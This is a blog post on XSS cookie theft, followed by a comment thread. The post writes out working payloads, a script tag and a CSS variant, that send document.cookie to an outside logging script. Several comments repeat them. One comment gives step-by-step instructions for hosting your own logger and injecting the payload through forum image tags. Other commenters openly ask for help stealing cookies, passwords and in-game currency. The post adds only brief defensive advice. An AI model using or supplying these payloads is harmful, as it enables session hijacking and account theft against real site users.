XSS – Stealing Cookies 101
Stealing cookies is easy. Never trust a client to be who you think it is. Just because it was trusted a few seconds ago, doesn't mean it will be in a few seconds, ESPECIALLY if a cookie is all you use to identify a client.
A recent LiveJournal hack has brought this to light again. Back when MySpace was hacked in October it reminded us that we must be vigilant in filtering text which users post because a hacker could smuggle in some javascript code to maliciously use the site from the browsers of authenticated users.
By stealing a users cookies as the LiveJournal hack did, you don't even have to cary out the attack in the users browser; you can do it elsewhere. Worst of all stealing cookies is EASY TO DO, and HARD TO PROTECT AGAINST.
Easy to do?
<script>
new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
</script>
We can also use another method in IE. Execute the javascript in CSS.
<style>
.getcookies{background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);');}
</style>
<p class="getcookies"></p>
So, you might want to start believing every session is stollen. I didn't even try to obfuscate that. Start rolling your sessions id's from one value to another, expire them in short intervals. Track the referrer, user agent, etc. Some of these changes don't add any real security, but they do add layers; and that always helps.
If you are not familiar with the MySpace XSS hack, read up. It's rich on the details.
If you want to view my server side logging script log.cgi, check it out; it's just a simple python cgi script that dumps the cookies to a text file.
4 years, 4 months ago
Can you please put the log.cgi on the site, nice Topic.
4 years, 4 months ago
Thanks for the comment; I originally intended to, but clearly forgot. I’ve updated the page above with a link.
4 years, 4 months ago
What CHMOD should I give it ?
4 years, 1 month ago
how do you steel cookies
3 years, 11 months ago
[...] XSS – Stealing Cookies 101 “Any time you let users post text and you don’t religiously restrict the content, they can steal sessions. Scarry? If you are a developer it better scare the hell out of you.” Not only scarry, but scary too. Oi! (tags: security javascript cookies xss programming) [...]
3 years, 10 months ago
nice info .. but i want to know how to steal cookies ..i know IP address of a computer but in a different country …
3 years, 10 months ago
[...] 5.1 Information theft Stealing Cookies, login credentials, banking information etc. http://jehiah.com/archive/xss-stealing-cookies-101 [...]
3 years, 9 months ago
sweet tutorial. it is suprising at how many sites dont filter user input as they should. With eveyone having blogs, and posting comments on social community websites Im sure that these kinds of attacks will be on the rise. Thanks for posting this.
3 years, 1 month ago
new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);
That would work then?
3 years, 1 month ago
new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);
3 years ago
Thoomas I believe you’ve got to get the users browser to execute that link.
One way to do this is to add that in forums [img] tags!
OH AND TO THE OWNER OF THIS WEB SITE:
Dued, BLUEberrys are what color? that’s the first time I’ve seen this sort of auth system. Pretty nice, and would be pretty darn east to implement too. Get a few more obvious Q’s and randomize them each time. hee hee.
2 years, 11 months ago
alert(‘foo’);
2 years, 9 months ago
OK, this is great, but if it was in English so I could understand it…
Sorry, but some of us are computer illiterate in a lot of ways. Can you tell me the simplest way in the simplest terms how to prevent phishing? Many people don’t even know the word phish and it seems to me that those of us that aren’t “in the know” are the root of the the way these things are spread. If you can explain it to me and I can do it, I can pass it on to all my friends who can send it to their friends and away we go.
Thanks so much for your time!!
2 years, 9 months ago
erm BBcode???
2 years, 8 months ago
where do the cookies go or where do you see them ?
2 years, 5 months ago
Can the server sided log.cgi file be uploaded on a free server like geocities.com?
where do will i get the cookies? i mean the result file where it will..how to view it
2 years, 1 month ago
.getcookies{background-image:url(‘javascript:new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);’);}
AMIDOINGITRITE?
2 years, 1 month ago
alert(“lawl”)
2 years ago
Excellent tutorial. I can’t believe some of the comments on here, though. Apparently, people want to send you all of the cookies they intend to capture using this method. Jeez. People, you have to copy the log.cgi file to your own server, then provide the link as:
new Image().src=”http://www.YOURDOMAIN.WHATEVER/log.cgi?c=”+encodeURI(document.cookie);
Next, you add your personalized version of this link and insert it into whatever website you’re trying to snarf the cookies from. If it’s a forum, you would use the [img][/img] BBCode.
There are many types of XSS exploits like this. Do more research, folks.
2 years ago
ok after i post
new Image().src=”http://www.YOURDOMAIN.WHATEVER/log.cgi?c=”+encodeURI(document.cookie);
and i have the log.cgi uploaded whats next?
1 year, 8 months ago
Simple XSS test.. just curious
1 year, 6 months ago
window.location = ‘http://localhost/b/steal.php?cookie=’ + document.cookie;
1 year, 2 months ago
new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);
1 year, 1 month ago
1 year ago
I think it’s funny how many computer illiterate people are in your audience trying to do things like XXS attacks. I think it’s important for developers and security professionals to understand this stuff. When you teach computer newbies how to do this stuff you are just breeding a new generation of script kiddies.
I realize Chaos beat me to this clarification but I’m going to reiterate it because it’s really humorous actually. These newbies don’t understand that this is a 2 part process!
1 part is the java script that you inject into a victim web page such as myspace or any other site that accepts user input and displays it elsewhere on the page (like a forum). When the vulnerable web page displays your input to the victim’s, it also runs your malicious java script. The java script is designed to retrieve the cookie from the victim which is possible since the script is running from within the vulnerable website.
Then the cookie is sent to the second part of the attack which is your cgi or php script located elsewhere on the internet. The cgi/php script has to be on your own server so when it records the cookie, it is somewhere you can retrieve it. If this is not obvious than I don’t know what you people are doing reading about this. Go pick up “Internet for dummies” before you get into computer security.
Anyways, great tutorial for intermediate or advanced computer users. And as for the newbies, thanks for the LOL’s.
10 months, 4 weeks ago
Ok, but what to do with the stolen cookie?
10 months, 3 weeks ago
javascript:alert()
10 months, 1 week ago
[...] cookie steal http://jehiah.cz/archive/xss-stealing-cookies-101 [...]
9 months, 3 weeks ago
lol you people have no clue. you can not do this
until you feed your link to the victim and how you do it is most important part
8 months, 3 weeks ago
hi guys im currently playing a game called eRepublik ive been trying to hack it and steal some gold ( which is the games currency) as well as any passwords. How is this possible and can some one send me th steps on my email
http://www.nikolascg92@hotmail.com